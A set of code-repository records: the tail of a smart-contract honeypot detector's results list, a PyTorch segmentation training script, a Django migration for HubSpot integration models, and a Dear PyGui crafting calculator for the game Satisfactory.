当前结果为0误报、0漏报\r\n0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4 has a high possibility to be a SMC hp (constructor type). √\r\n0x23f890c412f3f06784a30ba40ed4832a0fca55f0 has a high possibility to be a SMC hp (delegatecall type). √\r\n0x463f235748bc7862deaa04d85b4b16ac8fafef39 has a high possibility to be a SMC hp (constructor type). √\r\n0x477d1ee2f953a2f85dbecbcb371c2613809ea452 has a high possibility to be a SMC hp (delegatecall type). √\r\n0x62d5c4a317b93085697cfb1c775be4398df0678c has a high possibility to be a SMC hp (delegatecall type). √\r\n0x7a7d08bcb2faf27414e86ecf9a0351d928054b6b has a high possibility to be a SMC hp (delegatecall type). √\r\n0x7a8721a9d64c74da899424c1b52acbf58ddc9782 has a high possibility to be a SMC hp (function_onlyOwner type). √\r\n0x8c7777c45481dba411450c228cb692ac3d550344 has a high possibility to be a SMC hp (constructor type). √\r\n0x941d225236464a25eb18076df7da6a91d0f95e9e has a high possibility to be a SMC hp (constructor type). √\r\n0x95d34980095380851902ccd9a1fb4c813c2cb639 has a high possibility to be a SMC hp (constructor type). √\r\n0xa5d6accc5695327f65cbf38da29198df53efdcf0 has a high possibility to be a SMC hp (constructor type). √\r\n0xa91a453abde404a303fb118c46e00c8f630216a9 has a high possibility to be a SMC hp (delegatecall type). √\r\n0xb4c05e6e4cdb07c15095300d96a5735046eef999 has a high possibility to be a SMC hp (constructor type). √\r\n0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12 has a high possibility to be a SMC hp (constructor type). √\r\n0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e has a high possibility to be a SMC hp (constructor type). √\r\n0xbabfe0ae175b847543724c386700065137d30e3b has a high possibility to be a SMC hp (constructor type). √\r\n0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f has a high possibility to be a SMC hp (constructor type). √\r\n0xd116d1349c1382b0b302086a4e4219ae4f8634ff has a high possibility to be a SMC hp (constructor type). √\r\n0xdad02644b70cbb20dec56d25282ddc65bb7805a1 has a high possibility to be a SMC hp (delegatecall type). √\r\n0xe610af01f92f19679327715b426c35849c47c657 has a high possibility to be a SMC hp (constructor type). √\r\n0xfa8bb2a68c67e39409cd336d1a8024a2ad9a62ff has a high possibility to be a SMC hp (delegatecall type). √\r\n0xff5a11c0442028ee2a60d31e6ebb3cbac121ffe5 has a high possibility to be a SMC hp (delegatecall type). √\r\n'''\r\n\r\n'''\r\nhoneypots_all8tyes_FalsePositive.json -- 理论上就是无\r\n无\r\n'''\r\n\r\n'''\r\nhoneypots_more13_FromXGBootst_truePositive.json\r\n0x65e5909d665cbda128de96aa9eb0160729eac1b0 has a high possibility to be a SMC hp (constructor type). √\r\n'''\r\n\r\n'''\r\n# honeypots_paper_new_addr2SouceCode.json 通过HSU脚本检测到\r\n0x85179ac15aa94e3ca32dd1cc04664e9bb0062115 has a high possibility to be a SMC (depended on HSU) hp.\r\n0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b has a high possibility to be a SMC (depended on HSU) hp.\r\n------漏报--- 消除漏报的方法很简单, 只需要在当前SMC的检测脚本中将对转账指令的判断至于delegatecall绑定即可, 但这里在分析之后, 我认为时XGBoost他们的误报, 攻击者看不到明确的获利入口, 这样是无法吸引新手黑客的。\r\n0xa6c76471cc89cff4e65cc1fc36613f3c31e4d0d1,Straw Man Contract (SMC)\r\n0xd754ee6a9e8964602f48e11971e79d0b2f6452d5,Straw Man Contract (SMC)\r\n0x2f846758e479ee7e0bd87cea5b9f8f3e314c6bd9,Straw Man Contract (SMC)\r\n'''\r\n\r\n\r\n","repo_name":"yogaJtt/CADetector","sub_path":"CADetector实验代码/hp_SMC_sourceCode_detect.py","file_name":"hp_SMC_sourceCode_detect.py","file_ext":"py","file_size_in_byte":24088,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"1896190226","text":"import torch\nfrom torch.utils.data import DataLoader\nimport torch.optim as optim\nimport numpy as np\n\nimport segmentation_dataset as dataset\nimport segmentation_model\nimport segmentation_training as training\n\n\nif __name__ == \"__main__\":\n\n torch.manual_seed(0)\n\n # epochs = 20\n epochs = 7\n\n SPLIT_FILE = \"../KolektorSDD-training-splits/split.pyb\"\n ROOT_DIR = \"../KolektorSDD\"\n MODEL_PATH = \"model_{}epochs.pth\".format(epochs)\n LOSSES_PATH = \"losses_{}epochs.npy\".format(epochs)\n\n image_size = (1408 // 2, 512 // 2)\n channels = 1\n height, width = image_size\n learning_rate = 1e-2\n\n datasetTrain = dataset.SegmentationDatasetTrain(SPLIT_FILE, ROOT_DIR,\n image_size=image_size)\n average_image = datasetTrain.get_average_image()\n dataLoaderTrain = DataLoader(datasetTrain, shuffle=True)\n\n datasetVal = dataset.SegmentationDatasetVal(SPLIT_FILE, ROOT_DIR,\n image_size=image_size,\n average_image=average_image)\n dataLoaderVal = DataLoader(datasetVal)\n\n model = segmentation_model.SegmentationNet(channels, height, width)\n optimizer = optim.Adam(model.parameters(), lr=learning_rate)\n\n losses = training.train(dataLoaderTrain, dataLoaderVal, model, optimizer,\n epochs=epochs)\n\n torch.save(model.state_dict(), MODEL_PATH)\n np.save(LOSSES_PATH, losses)\n","repo_name":"sarastra/kolektor","sub_path":"segmentation/segmentation_training_script.py","file_name":"segmentation_training_script.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"43010838862","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport dirtyfields.dirtyfields\nimport django_extensions.db.fields\nfrom decimal import Decimal\nimport core.fields\nimport djmoney.models.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('revenues', '0006_auto_20160111_1529'),\n ('performance', '0008_auto_20160114_1957'),\n ('leads', '0003_program_contacts_to_mql_conversion'),\n ('companies', '0005_auto_20151207_1749'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='HubspotCampaignToICMOCampaign',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ],\n ),\n migrations.CreateModel(\n name='HubspotCompany',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('hs_company_id', models.CharField(max_length=255)),\n ('name', models.CharField(max_length=1024)),\n ('annualrevenue', models.IntegerField(null=True, blank=True)),\n ('industry', models.CharField(max_length=255, blank=True)),\n ('state', models.CharField(max_length=255, blank=True)),\n ('city', models.CharField(max_length=255, blank=True)),\n ('country', models.CharField(max_length=255, blank=True)),\n ('company', models.ForeignKey(to='companies.Company')),\n ],\n ),\n migrations.CreateModel(\n name='HubspotConnection',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),\n ('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),\n ('hub_id', models.CharField(help_text=b'Log into HubSpot to find your Hub ID in the upper righthand corner of the HubSpot application.', max_length=255)),\n ('access_token', models.CharField(max_length=255)),\n ('expires_at', models.DateTimeField(null=True)),\n ('refresh_token', models.CharField(max_length=255)),\n ('last_sync', models.DateTimeField(auto_now=True, null=True)),\n ('contacts_last_modified_date', models.DateTimeField(null=True, blank=True)),\n ('company', models.OneToOneField(to='companies.Company')),\n ],\n options={\n 'ordering': ('-modified', '-created'),\n 'abstract': False,\n 'get_latest_by': 'modified',\n },\n ),\n migrations.CreateModel(\n name='HubspotContact',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('vid', models.PositiveIntegerField()),\n ('associatedcompanyid', models.CharField(max_length=255, blank=True)),\n ('current_lifecyclestage', models.CharField(max_length=255)),\n ('hs_analytics_first_url', models.URLField(max_length=2048)),\n ('hs_analytics_source', models.CharField(max_length=255)),\n ('hs_analytics_source_data_1', models.CharField(max_length=2048)),\n ('hs_analytics_source_data_2', models.CharField(max_length=2048)),\n ('industry', models.CharField(max_length=255)),\n ('annualrevenue', models.PositiveIntegerField(null=True, blank=True)),\n ('campaign_name_guess', models.CharField(default=b'Unknown', max_length=255)),\n ('campaign_name_slug', models.CharField(max_length=255)),\n ('remote_timestamp', models.DateTimeField(null=True)),\n ('company', models.ForeignKey(to='companies.Company')),\n ('connection', models.ForeignKey(related_name='contacts', to='hubspot_icmo.HubspotConnection')),\n ],\n ),\n migrations.CreateModel(\n name='HubspotContactEvent',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('event_date', models.DateTimeField()),\n ('event_stage', models.CharField(max_length=50, choices=[(b'subscriber', b'Subscriber'), (b'lead', b'Lead'), (b'marketingqualifiedlead', b'Marketingqualifiedlead'), (b'salesqualifiedlead', b'Salesqualifiedlead'), (b'opportunity', b'Opportunity'), (b'customer', b'Customer')])),\n ('company', models.ForeignKey(to='companies.Company')),\n ('connection', models.ForeignKey(related_name='events', to='hubspot_icmo.HubspotConnection')),\n ('contact', models.ForeignKey(related_name='events', to='hubspot_icmo.HubspotContact')),\n ],\n ),\n migrations.CreateModel(\n name='HubspotDeal',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('deal_id', models.CharField(max_length=255)),\n ('contact_vid', models.CharField(max_length=255, blank=True)),\n ('hs_company_id', models.CharField(max_length=255, blank=True)),\n ('dealname', models.CharField(max_length=255)),\n ('amount_currency', djmoney.models.fields.CurrencyField(default=b'USD', max_length=3, editable=False, choices=[(b'USD', 'US Dollar')])),\n ('amount', core.fields.DefaultMoneyField(default=Decimal('0'), max_digits=10, decimal_places=2)),\n ('dealstage', models.CharField(max_length=255)),\n ('dealstage_last_modified', models.DateTimeField()),\n ('closedwon_date', models.DateTimeField(null=True, blank=True)),\n ('company', models.ForeignKey(to='companies.Company')),\n ('connection', models.ForeignKey(related_name='deals', to='hubspot_icmo.HubspotConnection')),\n ('contact', models.ForeignKey(blank=True, to='hubspot_icmo.HubspotContact', null=True)),\n ],\n ),\n migrations.CreateModel(\n name='HubspotRevenuePlan',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),\n ('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),\n ('segment_mapping_field', models.CharField(default=b'industry', max_length=255, choices=[(b'industry', b'Company Industry'), (b'annualrevenue', b'Company Annual Revenue')])),\n ('connection', models.ForeignKey(related_name='connected_plans', to='hubspot_icmo.HubspotConnection')),\n ('revenue_plan', models.OneToOneField(to='revenues.RevenuePlan')),\n ],\n options={\n 'ordering': ('-modified', '-created'),\n 'abstract': False,\n 'get_latest_by': 'modified',\n },\n bases=(dirtyfields.dirtyfields.DirtyFieldsMixin, models.Model),\n ),\n migrations.CreateModel(\n name='HubspotRevenuePlanCampaign',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=255)),\n ('slug', models.CharField(max_length=255)),\n ('hubspot_revenue_plan', models.ForeignKey(to='hubspot_icmo.HubspotRevenuePlan')),\n ('programs', models.ManyToManyField(to='leads.Program')),\n ('revenue_plan', models.ForeignKey(to='revenues.RevenuePlan')),\n ],\n options={\n 'ordering': ('name',),\n },\n ),\n migrations.CreateModel(\n name='HubspotRevenuePlanCampaignMonthPerformance',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),\n ('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),\n ('month', models.PositiveSmallIntegerField()),\n ('contacts', models.PositiveSmallIntegerField(default=0)),\n ('mql', models.PositiveSmallIntegerField(default=0)),\n ('sql', models.PositiveSmallIntegerField(default=0)),\n ('sales', models.PositiveSmallIntegerField(default=0)),\n ('sales_revenue_currency', djmoney.models.fields.CurrencyField(default=b'USD', max_length=3, editable=False, choices=[(b'USD', 'US Dollar')])),\n ('sales_revenue', core.fields.DefaultMoneyField(default=Decimal('0'), max_digits=10, decimal_places=0)),\n ('connection', models.ForeignKey(to='hubspot_icmo.HubspotConnection')),\n ('hubspot_revenue_plan', models.ForeignKey(to='hubspot_icmo.HubspotRevenuePlan')),\n ('hubspot_revenue_plan_campaign', models.ForeignKey(to='hubspot_icmo.HubspotRevenuePlanCampaign')),\n ('segment', models.ForeignKey(to='revenues.Segment')),\n ],\n options={\n 'ordering': ('hubspot_revenue_plan_campaign', 'month'),\n },\n ),\n migrations.CreateModel(\n name='HubspotRevenuePlanSegmentMap',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('mapping_field', models.CharField(max_length=255, choices=[(b'industry', b'Company Industry'), (b'annualrevenue', b'Company Annual Revenue')])),\n ('hs_value_1', models.CharField(max_length=255, blank=True)),\n ('hs_value_2', models.CharField(max_length=255, blank=True)),\n ('hubspot_revenue_plan', models.ForeignKey(related_name='segment_map', to='hubspot_icmo.HubspotRevenuePlan')),\n ('revenue_plan', models.ForeignKey(to='revenues.RevenuePlan')),\n ('segment', models.ForeignKey(blank=True, to='revenues.Segment', null=True)),\n ],\n options={\n 'ordering': ('hs_value_1',),\n },\n ),\n migrations.AddField(\n model_name='hubspotcompany',\n name='connection',\n field=models.ForeignKey(related_name='hs_companies', to='hubspot_icmo.HubspotConnection'),\n ),\n migrations.AddField(\n model_name='hubspotcampaigntoicmocampaign',\n name='hubspot_campaign',\n field=models.ForeignKey(related_name='icmo_campaigns', to='hubspot_icmo.HubspotRevenuePlanCampaign'),\n ),\n migrations.AddField(\n model_name='hubspotcampaigntoicmocampaign',\n name='icmo_campaign',\n field=models.ForeignKey(related_name='hubspot_campaigns', to='performance.Campaign'),\n ),\n ]\n","repo_name":"hasanulhaquebanna/testing-gregg","sub_path":"icmo/apps/hubspot_icmo/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":11444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"28814904558","text":"import dearpygui.dearpygui as dpg\r\nimport time\r\n\r\ndpg.create_context()\r\n\r\nclass floatvar:\r\n def __init__(self, tag, value=0.0):\r\n self.tag = tag\r\n self.value = value\r\n def set(self, value):\r\n self.value = value\r\n dpg.set_value(self.tag, self.value)\r\n def get(self):\r\n return self.value\r\n\r\nclass listvar:\r\n def __init__(self, tag):\r\n self.tag = tag\r\n self.value = dpg.get_value(self.tag)\r\n def set(self, value):\r\n self.value = sorted(value)\r\n dpg.configure_item(self.tag, items=self.value)\r\n def get(self):\r\n return dpg.get_value(self.tag)\r\n\r\nclass ITEM:\r\n def __init__(self, ID, NAME, primary=False):\r\n self.ID = ID\r\n self.NAME = NAME\r\n self.primary = primary\r\n def __getitem__(self, key):\r\n return [self.ID, self.NAME][key]\r\n def __repr__(self):\r\n return f\"|ITEM: {self.ID} {self.NAME}|\"\r\n\r\nclass STRUCTURE(ITEM):\r\n def __repr__(self):\r\n return f\"|STRUCTURE: {self.ID} {self.NAME}|\"\r\n\r\nclass CRAFT:\r\n def __init__(self, id, row):\r\n self.ID =id\r\n self.IDstr = row[0]\r\n self.IImp = (row[1], row[2], row[3], row[4])\r\n self.SImp = (row[5], row[6], row[7], row[8])\r\n self.SExp = row[9]\r\n self.IExp = row[10]\r\n def __repr__(self):\r\n return f\"|Craft: {self.ID} {self.IDstr} {self.IImp} {self.SImp} {self.SExp} {self.IExp}|\"\r\n\r\nclass TreeNode:\r\n def __init__(self, item, structure, veight, veight_i, level=0, father=None):\r\n self.id = countplus()\r\n self.item = item\r\n self.structure = structure\r\n self.veight = veight\r\n self.veight_i = veight_i\r\n self.depend = []\r\n self.level = level\r\n self.father = father\r\n self.x, self.y = 0, self.level*400+30\r\n def append(self, item, structure, veight, veight_i, level=0):\r\n self.depend.append(TreeNode(item, structure, veight, veight_i, level, self.id))\r\n def print(self):\r\n global TEMPID\r\n if not(self.item in TEMPID):\r\n TEMPID.append(self.item)\r\n if not(self.structure in TEMPID) and self.structure!=None:\r\n TEMPID.append(self.structure)\r\n\r\nclass BinaryTree:\r\n def __init__(self, get):\r\n id_item = sITEMS[get]\r\n craft__ = CRAFTS[sCRAFTS[id_item]]\r\n self.level = 0\r\n self.b_tree = TreeNode(id_item, craft__.IDstr, craft__.SExp, craft__.SImp, self.level)\r\n for ix, i in enumerate(craft__.IImp):\r\n if i !=None:\r\n if not (i in sCRAFTS):\r\n stru = None\r\n veight = None\r\n veight_i = (None, None, None, None)\r\n self.b_tree.append(i, stru, veight, veight_i, self.level + 1)\r\n else:\r\n craft_ = CRAFTS[sCRAFTS[i]]\r\n stru = craft_.IDstr\r\n veight = craft_.SExp\r\n veight_i = craft_.SImp\r\n self.b_tree.append(i, stru, veight, veight_i, self.level+1)\r\n self.aappend(i, self.b_tree.depend[ix], self.level+1)\r\n return\r\n def aappend(self,id_item, tree, level):\r\n craft_ = CRAFTS[sCRAFTS[id_item]]\r\n for ix, i in enumerate(craft_.IImp):\r\n if i !=None:\r\n if not (i in sCRAFTS):\r\n stru = None\r\n veight_e = None\r\n veight_i = (None, None, None, None)\r\n tree.append(i, stru, veight_e, veight_i, level + 1)\r\n else:\r\n craft = CRAFTS[sCRAFTS[i]]\r\n stru = craft.IDstr\r\n veight_e = craft.SExp\r\n veight_i = craft.SImp\r\n tree.append(i, stru, veight_e, veight_i, level+1)\r\n self.aappend(i, tree.depend[ix], level+1)\r\n\r\ndef countplus():\r\n global Counter\r\n Counter +=1\r\n return Counter-1\r\n\r\ndef countzero():\r\n global Counter\r\n Counter = 0\r\n\r\ndef initCraft():\r\n global CRAFTS, sCRAFTS\r\n sCRAFTS = {}\r\n for i in CRAFTS:\r\n if i.IImp[0] != None:\r\n sCRAFTS[i.IExp] = i.ID\r\n\r\ndef DBget():\r\n global ITEMS, STRUCTURS, CRAFTS, sSTRUCTURS, sITEMS\r\n from openpyxl import load_workbook\r\n wb = load_workbook(filename='BD.xlsx')\r\n wsITEMS = wb[\"Items\"]\r\n wsSTRUCTURES = wb[\"Structures\"]\r\n wsCRAFTS = wb[\"Crafts\"]\r\n for row in tuple(wsITEMS.values):\r\n ITEMS.append(ITEM(ID=row[0], NAME=row[1]))\r\n for row in tuple(wsSTRUCTURES.values):\r\n STRUCTURS.append(STRUCTURE(ID=row[0], NAME=row[1]))\r\n for irow, row in enumerate(tuple(wsCRAFTS.values)):\r\n CRAFTS.append(CRAFT(irow, row))\r\n for i in ITEMS:\r\n sITEMS[i[1]] = i[0]\r\n for i in STRUCTURS:\r\n sSTRUCTURS[i[1]] = i[0]\r\n initCraft()\r\n\r\ndef clear_data(sender, app_data, user_data):\r\n global DownloadVar, ITEMS, STRUCTURS, CRAFTS, sITEMS, sSTRUCTURS, sLevel, TEMPID, sFather, NODES\r\n clear_pic = True\r\n import os\r\n try:\r\n os.remove(\"BD.xlsx\")\r\n except:\r\n pass\r\n try:\r\n if clear_pic:\r\n import shutil\r\n shutil.rmtree(\"pic\")\r\n shutil.rmtree(\"TEMP\")\r\n except:\r\n pass\r\n ITEMS, STRUCTURS, CRAFTS, sITEMS, sSTRUCTURS, sCRAFTS, sLevel, TEMPID, sFather, sLinks, NODES = [], [], [], {}, {}, {}, {}, [], {}, {}, []\r\n DownloadVar.set(0.0)\r\n\r\ndef update_data(sender, app_data, user_data):\r\n global DownloadVar, ITEMS, STRUCTURS, CRAFTS, sITEMS, sSTRUCTURS, ListComboboxVar\r\n dpg.bind_item_theme(\"Download\", \"theme_progressbar_blue\")\r\n dpg.configure_item(\"DB1\", enabled=False)\r\n dpg.configure_item(\"DB2\", enabled=False)\r\n clear_data(sender, app_data, user_data)\r\n import Fparser as BD\r\n BD.parser(boolpic=True, DownloadVar=DownloadVar)\r\n DBget()\r\n initCraft()\r\n ListComboboxVar.set(convertDictList(sITEMS))\r\n dpg.configure_item(\"DB1\", enabled=True)\r\n dpg.configure_item(\"DB2\", enabled=True)\r\n dpg.bind_item_theme(\"Download\", \"theme_progressbar_green\")\r\n\r\ndef START_CRAFT(sender, app_data, user_data):\r\n global TEMPID, sLevel, sFather, sLinks\r\n clear_node()\r\n TEMPID, sLevel, sFather, sLinks, NODES = [], {}, {}, {}, []\r\n countzero()\r\n def errorSTART():\r\n dpg.bind_item_theme(\"Calculate\", \"theme_button_red\")\r\n time.sleep(1)\r\n dpg.bind_item_theme(\"Calculate\", \"theme_button_gr\")\r\n\r\n item = ListComboboxVar.get()\r\n\r\n if item == \"Select item: \":\r\n errorSTART()\r\n return\r\n id_item = sITEMS[item]\r\n if sCRAFTS.get(id_item) != None:\r\n TREE = BinaryTree(item)\r\n def pre_order(node):\r\n global sLevel, sFather\r\n if node.father in sFather:\r\n sFather[node.father].append(node.id)\r\n elif node.father != None:\r\n sFather[node.father] = [node.id]\r\n if node.level in sLevel:\r\n sLevel[node.level] +=1\r\n else:\r\n sLevel[node.level] = 1\r\n node.x = (sLevel[node.level]-1)*300+30\r\n node.print()\r\n for i in node.depend:\r\n pre_order(i)\r\n pre_order(TREE.b_tree)\r\n pre_init_pic()\r\n def order(node):\r\n global sLevel, sFather\r\n create_node(node.id, node.x, node.y, node.item, node.structure, node.veight, node.veight_i)\r\n for i in node.depend:\r\n order(i)\r\n order(TREE.b_tree)\r\n create_links()\r\n else:\r\n errorSTART()\r\n return\r\n\r\ndef clear_node():\r\n for i in NODES:\r\n dpg.delete_item(i)\r\n\r\ndef create_links():\r\n for i in list(sFather.keys()):\r\n for jx, j in enumerate(sFather[i]) :\r\n dpg.add_node_link(sLinks[i][jx+1], sLinks[j][0], parent=\"node_editor\")\r\n\r\ndef create_node(id, x, y, item, structure, veight, veight_i):\r\n def _create(name, id, y, x):\r\n NODES.append(f\"node_{id}_{name}\")\r\n try:\r\n with dpg.add_node(label=f\"{name}\", parent=\"node_editor\", tag=f\"node_{id}_{name}\", pos=[x, y]):\r\n pass\r\n except:\r\n pass\r\n dpg.bind_item_font(f\"node_{id}_{name}\", font01)\r\n def _attrib(name, id, item, veight, veight_i, type_):\r\n if type_==1:\r\n with dpg.node_attribute(parent=f\"node_{id}_{name}\", tag=f\"node {id} out 0\"):\r\n with dpg.drawlist(width=100, height=100):\r\n dpg.draw_rectangle((0, 0), (100, 100), color=(100, 100, 100, 250), thickness=2)\r\n dpg.draw_image(f\"texture_{item}\", [0, 0], [100, 100])\r\n sLinks[id] = [f\"node {id} out 0\"]\r\n else:\r\n with dpg.node_attribute(parent=f\"node_{id}_{name}\", tag=f\"node {id} item-struct 2\"):\r\n dpg.bind_item_font(dpg.add_text(f\"output: {veight}\"), font0)\r\n if type_ == 1:\r\n with dpg.node_attribute(parent=f\"node_{id}_{name}\", attribute_type=dpg.mvNode_Attr_Output, tag=f\"node {id} item-struct 1\"):\r\n dpg.bind_item_font(dpg.add_text(veight),font0)\r\n else:\r\n with dpg.node_attribute(parent=f\"node_{id}_{name}\", attribute_type=dpg.mvNode_Attr_Static):\r\n with dpg.drawlist(width=100, height=100):\r\n dpg.draw_rectangle((0, 0), (100, 100), color=(100, 100, 100, 250), thickness=2)\r\n dpg.draw_image(f\"texture_{item}\", [0, 0], [100, 100])\r\n for ix, i in enumerate(veight_i):\r\n if i!=None:\r\n with dpg.node_attribute(parent=f\"node_{id}_{name}\", attribute_type=dpg.mvNode_Attr_Output, tag=f\"node {id} inp {ix}\"):\r\n dpg.bind_item_font(dpg.add_text(f\"input: {i}\"), font0)\r\n sLinks[id].append(f\"node {id} inp {ix}\")\r\n\r\n item_name = ITEMS[item - 1].NAME\r\n _create(item_name, id, x, y)\r\n _attrib(item_name, id, item, \" \",None,1)\r\n if structure!=None:\r\n struct_name = STRUCTURS[structure - STRUCTURS[0].ID].NAME\r\n _create(struct_name, id, x, y + 200)\r\n _attrib(struct_name, id, structure, veight, veight_i, 2)\r\n dpg.add_node_link(f\"node {id} item-struct 1\", f\"node {id} item-struct 2\", parent=\"node_editor\")\r\n\r\ndef pre_init_pic():\r\n from PIL import Image, ImageDraw\r\n from os import mkdir\r\n global initedPIC\r\n try:\r\n import shutil\r\n shutil.rmtree(\"TEMP\")\r\n except:\r\n pass\r\n try:\r\n mkdir(\"TEMP\")\r\n except:\r\n pass\r\n for i in initedPIC:\r\n dpg.delete_item(i)\r\n initedPIC = []\r\n for name in TEMPID:\r\n im1 = Image.new('RGBA', (256, 256), (0, 0, 0, 0))\r\n im2 = Image.open(f\"pic/{name}.png\").convert('RGBA').resize((210, 210))\r\n im1.paste(im2, (23, 23))\r\n draw = ImageDraw.Draw(im1)\r\n draw.ellipse((0, 0, 255, 255), outline=(255, 255, 255), width=7)\r\n im1.save(f\"TEMP/{name}.png\")\r\n width, height, channels, data = dpg.load_image(f\"TEMP/{name}.png\")\r\n with dpg.texture_registry(show=False):\r\n dpg.add_static_texture(width=width, height=height, default_value=data, tag=f\"texture_{name}\")\r\n initedPIC.append(f\"texture_{name}\")\r\n\r\ndef TEMPDEBUG(sender, app_data, user_data):\r\n print(ITEMS,STRUCTURS,CRAFTS,sITEMS,sSTRUCTURS,sCRAFTS,TEMPID,sLevel,sFather,sLinks,NODES,initedPIC, sep=\"\\n\")\r\n\r\ndef buttonhelp(sender, app_data, user_data):\r\n import webbrowser\r\n url = \"https://vk.com/degroidnayatvarina\"\r\n webbrowser.open(url, new=0, autoraise=True)\r\n\r\nconvertDictList = lambda s: [i[0] for i in s.items()]\r\n\r\nX,Y = 700, 652\r\nDownloadVar = floatvar(\"Download\")\r\nListComboboxVar = listvar(\"Combobox\")\r\nITEMS = []\r\nSTRUCTURS = []\r\nCRAFTS = []\r\nNODES = []\r\ninitedPIC = []\r\nTEMPID = []\r\nsSTRUCTURS = {}\r\nsITEMS = {}\r\nsCRAFTS = {}\r\nsLevel = {}\r\nsFather = {}\r\nsLinks = {}\r\nCounter = 0\r\n\r\ndpg.create_viewport(title=\"Calculator\", small_icon=\"main.ico\", large_icon=\"main.ico\")\r\ndpg.configure_viewport(0,x_pos=300, y_pos=200,width=X, height=Y, resizable=True)\r\n\r\nwith dpg.font_registry():\r\n font0 = dpg.add_font(file=\"My.otf\", size=12)\r\n font01 = dpg.add_font(file=\"My.otf\", size=14)\r\n font1 = dpg.add_font(file=\"My.otf\", size=20)\r\n font2 = dpg.add_font(file=\"My.otf\", size=40)\r\n font3 = dpg.add_font(file=\"My.otf\", size=50)\r\n font4 = dpg.add_font(file=\"My.otf\", size=60)\r\n\r\nwith dpg.theme(tag=\"theme_button_red\"):\r\n with dpg.theme_component(dpg.mvButton):\r\n dpg.add_theme_color(dpg.mvThemeCol_Button, (177, 86, 135, 255))\r\nwith dpg.theme(tag=\"theme_button_gr\"):\r\n with dpg.theme_component(dpg.mvButton):\r\n dpg.add_theme_color(dpg.mvThemeCol_Button, (51, 51, 55, 255))\r\n\r\nwith dpg.theme(tag=\"theme_progressbar_green\"):\r\n with dpg.theme_component(dpg.mvProgressBar):\r\n dpg.add_theme_color(dpg.mvThemeCol_PlotHistogram, (15, 135, 86, 255))\r\nwith dpg.theme(tag=\"theme_progressbar_blue\"):\r\n with dpg.theme_component(dpg.mvProgressBar):\r\n dpg.add_theme_color(dpg.mvThemeCol_PlotHistogram, (15, 86, 135, 255))\r\n\r\nwith dpg.window(no_resize=True, tag=\"Main_window\"):\r\n with dpg.group():\r\n with dpg.group(horizontal=True):\r\n dpg.add_loading_indicator(circle_count=12, style=0, radius=7, speed=0.3)\r\n dpg.bind_item_font(dpg.add_text(default_value=\"Satisfactory\\ncalculator\"), font3)\r\n dpg.add_button(label=\"Debag\", width=171, callback=TEMPDEBUG, show=False) #Button debug\r\n with dpg.group(horizontal=True, horizontal_spacing=5):\r\n dpg.bind_item_font(dpg.add_button(label=\"Creator\", width=171, callback=buttonhelp), font1)\r\n dpg.bind_item_font(dpg.add_combo((), width=387, default_value=\"Select item: \", tag=\"Combobox\"), font1)\r\n dpg.bind_item_font(dpg.add_button(label=\"Clear\", width=98, callback=clear_node), font1)\r\n dpg.add_separator()\r\n with dpg.group(horizontal=True, horizontal_spacing=5):\r\n with dpg.group():\r\n from os.path import isfile\r\n try:\r\n import shutil\r\n shutil.rmtree(\"TEMP\")\r\n except:\r\n pass\r\n if isfile(\"BD.xlsx\"):\r\n _ = 1.0\r\n DBget()\r\n ListComboboxVar.set(convertDictList(sITEMS))\r\n else:\r\n _ = 0.0\r\n dpg.add_progress_bar(tag=\"Download\", default_value=_, width=346, height=3)\r\n dpg.bind_item_theme(\"Download\", \"theme_progressbar_green\")\r\n with dpg.group(horizontal=True, horizontal_spacing=5):\r\n dpg.bind_item_font(dpg.add_button(tag=\"DB1\", label=\" Data Update \", width=171, height=49, callback=update_data), font1)\r\n dpg.bind_item_font(dpg.add_button(tag=\"DB2\", label=\" Clear Data \", width=170, height=49, callback=clear_data), font1)\r\n\r\n dpg.bind_item_font(dpg.add_button(label=\"Calculate\", tag=\"Calculate\", width=315, height=56, callback=START_CRAFT), font2)\r\n\r\n with dpg.node_editor(\r\n callback=lambda sender, app_data: dpg.add_node_link(app_data[0], app_data[1], parent=sender),\r\n delink_callback=lambda sender, app_data: dpg.delete_item(app_data), minimap=True,\r\n minimap_location=dpg.mvNodeMiniMap_Location_BottomRight, tag=\"node_editor\"):\r\n pass\r\ndpg.set_primary_window(window=\"Main_window\", 